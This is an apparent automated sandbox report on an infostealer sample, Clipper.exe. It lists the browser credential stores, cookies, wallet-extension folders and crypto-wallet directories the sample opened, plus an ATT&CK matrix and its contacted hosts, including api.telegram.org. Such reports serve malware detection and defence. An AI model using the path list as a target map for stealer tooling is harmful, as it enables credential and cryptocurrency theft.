Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmidedJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioamekaJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmgJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkkJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoeJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafchJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqliteJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		1
Masquerading		1
OS Credential Dumping		21
Security Software Discovery		Remote Services3
Data from Local System		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Abuse Elevation Control Mechanism		LSA Secrets1
System Network Configuration Discovery		SSHKeylogging4
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing		DCSync22
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Clipper.exe54%ReversingLabsWin32.Trojan.Generic
Clipper.exe45%VirustotalBrowse
Clipper.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
ipwho.is0%VirustotalBrowse
api.telegram.org2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
https://www.ecosia.org/newtab/0%URL Reputationsafe
https://www.ecosia.org/newtab/0%URL Reputationsafe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
https://duckduckgo.com/ac/?q=0%VirustotalBrowse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ipwho.is
195.201.57.90
truefalseunknown
api.telegram.org
149.154.167.220
truetrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://ac.ecosia.org/autocomplete?q=Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://duckduckgo.com/chrome_newtabClipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpfalseunknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpfalseunknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://duckduckgo.com/ac/?q=Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpfalseunknown
https://www.google.com/images/branding/product/ico/googleg_lodp.icoClipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpfalseunknown
https://www.ecosia.org/newtab/Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchClipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
149.154.167.220
api.telegram.orgUnited Kingdom
62041TELEGRAMRUtrue
195.201.57.90
ipwho.isGermany
24940HETZNER-ASDEfalse

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1450354
Start date and time:2024-06-01 18:45:56 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 57s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Clipper.exe
Detection:MAL
Classification:mal76.troj.spyw.evad.winEXE@4/14@2/2
EGA Information:Failed
HCA Information:
